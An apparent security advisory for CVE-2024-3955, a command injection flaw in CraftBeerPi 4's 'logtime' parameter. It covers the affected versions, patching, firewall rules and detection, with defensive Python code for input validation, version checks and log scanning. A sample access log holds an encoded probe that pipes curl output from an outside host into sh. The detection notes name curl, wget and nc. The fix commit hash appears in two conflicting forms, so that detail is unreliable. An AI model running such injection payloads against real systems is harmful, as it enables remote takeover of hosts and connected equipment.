CVE-2024-3955

9.8 CRITICAL

📋 TL;DR

CVE-2024-3955 is a critical (CVSS 9.8) command injection vulnerability in CraftBeerPi 4. The 'logtime' value supplied to the log-download endpoint is concatenated into a shell command string and handed to os.system() without validation, so an unauthenticated remote attacker can run arbitrary commands on the host as the user that runs CraftBeerPi. Every installation in the affected version range is exposed; internet-facing instances are at the greatest risk.

💻 Affected Systems

Products:
  • CraftBeerPi 4
Versions: From 4.0.0.58 (commit 563fae9) to before 4.4.1.a1 (commit 575727c)
Operating Systems: Linux (primary), potentially any OS running Python
Default Config Vulnerable: ⚠️ Yes
Notes: All default installations within the affected version range are vulnerable. The vulnerability is in the core code and doesn't require special configuration.


⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete system compromise, allowing the attacker to install malware, exfiltrate data, pivot to other systems, or drive the heaters, pumps and valves that CraftBeerPi controls and damage brewing equipment.

🟠 Likely Case: The attacker gains shell access on the CraftBeerPi host as the service user, compromising the host and any brewing hardware attached to it.

🟢 If Mitigated: Limited impact when the service is reachable only from trusted hosts, the logtime value is validated, and CraftBeerPi runs as an unprivileged user rather than root.

🌐 Internet-Facing: HIGH - Unauthenticated RCE accessible via HTTP requests makes internet-facing instances extremely vulnerable to automated attacks.
🏢 Internal Only: HIGH - Even internal instances are vulnerable to any user with network access to the CraftBeerPi service.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The vulnerability is straightforward to exploit with simple HTTP requests containing command injection payloads in the logtime parameter.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.4.1.a1 (commit 57572c7) and later

Vendor Advisory: https://github.com/PiBrewing/craftbeerpi4/issues/132

Restart Required: Yes

Instructions:

1. Back up your configuration and data (the CraftBeerPi config directory and logs).
2. Update CraftBeerPi 4 to version 4.4.1.a1 or later using the method you installed it with: pip install --upgrade cbpi4 for a pip installation, or git pull origin master in a source checkout.
3. Restart the CraftBeerPi service (sudo systemctl restart craftbeerpi if it runs under systemd).
4. Verify the fix by checking the version: pip show cbpi4 or the version shown in the web interface must report 4.4.1.a1 or later.

🔧 Temporary Workarounds

Input Validation Filter (all platforms)

Add an allowlist check on the logtime parameter before it reaches any command.

In cbpi/http_endpoints/http_system.py, reject any logtime value containing characters outside the expected set (digits, letters, hyphens, underscores) and cap its length. Treat this as a stop-gap: the durable fix is to stop building a shell command from the value at all, passing it as a single argv element to subprocess instead of interpolating it into an os.system() string.
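The allowlist described above, next to the fix that takes the shell out of the picture, as an added example. This is not the project's code: the printf command stands in for whatever log-copying command http_system.py actually runs, and the payload is a constructed, harmless one.

```python
import re
import subprocess

# Allowlist from the workaround above: letters, digits, hyphen, underscore, bounded
# length. \A and \Z (not ^ and $) so a trailing newline cannot sneak past the check.
LOGTIME_RE = re.compile(r"\A[A-Za-z0-9_-]{1,64}\Z")


def is_valid_logtime(value) -> bool:
    """True only if value is a string that matches the allowlist."""
    return isinstance(value, str) and LOGTIME_RE.fullmatch(value) is not None


def run_unsafe(logtime: str) -> str:
    """Constructed stand-in for the vulnerable pattern: the untrusted value is pasted
    into a command string that /bin/sh interprets, which is what os.system() does.
    printf replaces the real log-copying command so the demonstration is harmless."""
    cmd = "printf '%s\\n' " + logtime
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_argv_only(logtime: str) -> str:
    """The same action with no shell: each argument is its own argv element, so ';',
    '|', '$(...)' and friends are plain characters inside a single argument."""
    argv = ["printf", "%s\n", logtime]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def run_safe(logtime: str) -> str:
    """Hardened handler: reject anything outside the allowlist, then run without a
    shell. Both layers are kept on purpose (defence in depth)."""
    if not is_valid_logtime(logtime):
        raise ValueError("logtime rejected: only [A-Za-z0-9_-]{1,64} is accepted")
    return run_argv_only(logtime)


if __name__ == "__main__":
    payload = "x; echo INJECTED"  # constructed, harmless injection payload
    print("shell string :", repr(run_unsafe(payload)))     # second command runs
    print("argv list    :", repr(run_argv_only(payload)))  # printed literally
    try:
        run_safe(payload)
    except ValueError as exc:
        print("validated    :", exc)
```

run_unsafe returns "x\nINJECTED\n" because the shell split the string at the semicolon and executed the second command; run_argv_only returns the whole payload as one literal line. The allowlist gives the request a clear early rejection; the argv list is the defence that still holds if a validation check is forgotten on another endpoint.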

Network Access Restriction (linux)

Restrict network access to the CraftBeerPi service to trusted hosts. A lone deny rule also locks out the operator, so add an allow rule for your management subnet first (ufw evaluates rules in order). Use either ufw or raw iptables on a host, not both. Replace 5000 with the port set in CraftBeerPi's config.yaml and 192.168.1.0/24 (an example subnet) with your own.

sudo ufw allow from 192.168.1.0/24 to any port 5000 proto tcp
sudo ufw deny 5000/tcp

# iptables equivalent: -I inserts at the head of INPUT so an earlier ACCEPT cannot shadow
# the rule; insert the DROP first so the ACCEPT that follows ends up above it
sudo iptables -I INPUT -p tcp --dport 5000 -j DROP
sudo iptables -I INPUT -s 192.168.1.0/24 -p tcp --dport 5000 -j ACCEPT

🧯 If You Can't Patch

  • Immediately isolate the CraftBeerPi system from the internet and restrict network access to trusted IPs only
  • Implement a web application firewall (WAF) with command injection rules to block malicious requests

🔍 How to Verify

Check if Vulnerable:

Your installation is vulnerable if its version is at least 4.0.0.58 and below 4.4.1.a1. Alternatively, on a test instance you control, send a request with a harmless command injection payload in the logtime parameter and observe whether it executes.

Check Version:

The version is shown in the CraftBeerPi web interface. On the host, pip show cbpi4 reports it for a pip installation, and git log -1 in a source checkout gives the commit, which you can compare with the affected range above.

Verify Fix Applied:

Confirm the version is 4.4.1.a1 or later and, on a test instance, that a logtime value containing shell metacharacters is rejected rather than executed.
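A version-range check for the numbers quoted on this page, added here as an example rather than anything from the project. It assumes CraftBeerPi version strings look like the ones above (4.0.0.58, 4.4.1.a1) and that the installed package exposes cbpi.__version__; a pre-release suffix is ordered before the final release of the same number, so 4.4.1.a1 counts as fixed while 4.4.0 does not.

```python
import re

# Accepts strings such as "4.0.0.58", "4.4.1.a1", "4.4.1a1", "4.4.1", optionally "v"-prefixed.
VERSION_RE = re.compile(r"\A[vV]?(\d+(?:\.\d+)*)(?:[.\-_]?(a|b|rc)(\d*))?\Z")
PRE_ORDER = {"a": 0, "b": 1, "rc": 2}


def version_key(text: str) -> tuple:
    """Sortable key: (release, 1 for final / 0 for pre-release, pre kind, pre number)."""
    m = VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    release = [int(part) for part in m.group(1).split(".")]
    while len(release) > 1 and release[-1] == 0:  # 4.4.1.0 is the same release as 4.4.1
        release.pop()
    if m.group(2):  # pre-release sorts before the final release with the same number
        return (tuple(release), 0, PRE_ORDER[m.group(2)], int(m.group(3) or 0))
    return (tuple(release), 1, 0, 0)


# Bounds as stated on this page: affected from 4.0.0.58, fixed in 4.4.1.a1.
AFFECTED_FROM = version_key("4.0.0.58")
FIXED_IN = version_key("4.4.1.a1")


def is_affected(version: str) -> bool:
    """True if version falls inside [4.0.0.58, 4.4.1.a1)."""
    return AFFECTED_FROM <= version_key(version) < FIXED_IN


def installed_status():
    """Check the package installed in this interpreter; None if cbpi is not importable.
    Assumption: the cbpi4 package exposes its version as cbpi.__version__."""
    try:
        from cbpi import __version__
    except ImportError:
        return None
    return __version__, is_affected(__version__)


if __name__ == "__main__":
    for v in ["4.0.0.57", "4.0.0.58", "4.4.0", "4.4.1.a1", "4.4.1"]:
        print(f"{v:<10} affected={is_affected(v)}")
    print("installed:", installed_status())
```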

📡 Detection & Monitoring

Log Indicators:

  • Process-creation events in which the CraftBeerPi Python process spawns a shell (sh -c) whose children are not the expected log-handling commands (for example curl, wget, nc, or a second python -c)
  • Repeated requests to the log-download endpoint with varying logtime values, typical of payload probing
  • logtime values in HTTP access logs containing shell metacharacters (; | & ` $( ) or their URL-encoded forms such as %3B, %7C and %0a

Network Indicators:

  • HTTP requests to /api/system/log/download with unusual logtime parameters
  • Outbound connections from CraftBeerPi to unexpected destinations

SIEM Query:

source="craftbeerpi" AND ("logtime" CONTAINS "|" OR "logtime" CONTAINS ";" OR "logtime" CONTAINS "`" OR "logtime" CONTAINS "$")

URL-decode the request URI before matching: a payload sent as %3B or %7C never contains the literal character this query looks for, and a newline (%0a) also terminates a command but is absent from the list above.
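The decoding step that the literal SIEM query lacks, run over constructed access-log lines, as an added example (not part of this page's original content or of CraftBeerPi). It assumes the combined log format and that the logtime value travels either as a ?logtime= query parameter or inside the path under /api/system/log; the sample lines and IP addresses are made up.

```python
import re
from urllib.parse import unquote, urlsplit

# Characters an injected logtime needs to break out of the command: separators,
# pipes, background, command substitution and newlines (the last is easy to forget).
METACHAR_RE = re.compile(r"[;|&`$\n\r]")

# One line of nginx/Apache combined log format; only the request target matters here.
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumption: the vulnerable endpoint lives under this prefix (taken from the page).
LOG_ENDPOINT_PREFIX = "/api/system/log"


def injected_values(target: str) -> list:
    """Decode the request target and return the logtime-bearing parts that contain
    shell metacharacters: the ?logtime= value and, as a fallback, the decoded path."""
    parts = urlsplit(target)
    if not parts.path.startswith(LOG_ENDPOINT_PREFIX):
        return []
    candidates = [unquote(parts.path)]
    for pair in parts.query.split("&"):      # split on the raw '&' before decoding,
        key, _, value = pair.partition("=")  # so an encoded %26 stays inside the value
        if key == "logtime":
            candidates.append(unquote(value))
    return [c for c in candidates if METACHAR_RE.search(c)]


def scan_access_log(text: str) -> list:
    """Return (client_ip, decoded_value) for every line carrying a suspicious logtime."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        for value in injected_values(m.group("target")):
            hits.append((m.group("ip"), value))
    return hits


# Constructed sample: one legitimate download, two probes using URL-encoded
# metacharacters that a literal match on ';' or '|' would miss, one unrelated request.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [12/May/2024:10:01:22 +0000] "GET /api/system/log/download?logtime=20240512 HTTP/1.1" 200 4311 "-" "Mozilla/5.0"
203.0.113.9 - - [12/May/2024:10:02:05 +0000] "GET /api/system/log/download?logtime=x%3Bcurl%20198.51.100.5%2Fs%7Csh HTTP/1.1" 200 12 "-" "python-requests/2.31"
203.0.113.9 - - [12/May/2024:10:02:09 +0000] "GET /api/system/log/download?logtime=x%0aid HTTP/1.1" 200 12 "-" "python-requests/2.31"
203.0.113.11 - - [12/May/2024:10:03:40 +0000] "GET /api/dashboard/ HTTP/1.1" 200 987 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, value in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{ip}\t{value!r}")
```

Only the two probe lines are reported; the legitimate download and the unrelated dashboard request are not. Keep the prefix filter: the same metacharacters are legitimate in other parameters, and a host-wide match would drown the signal.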
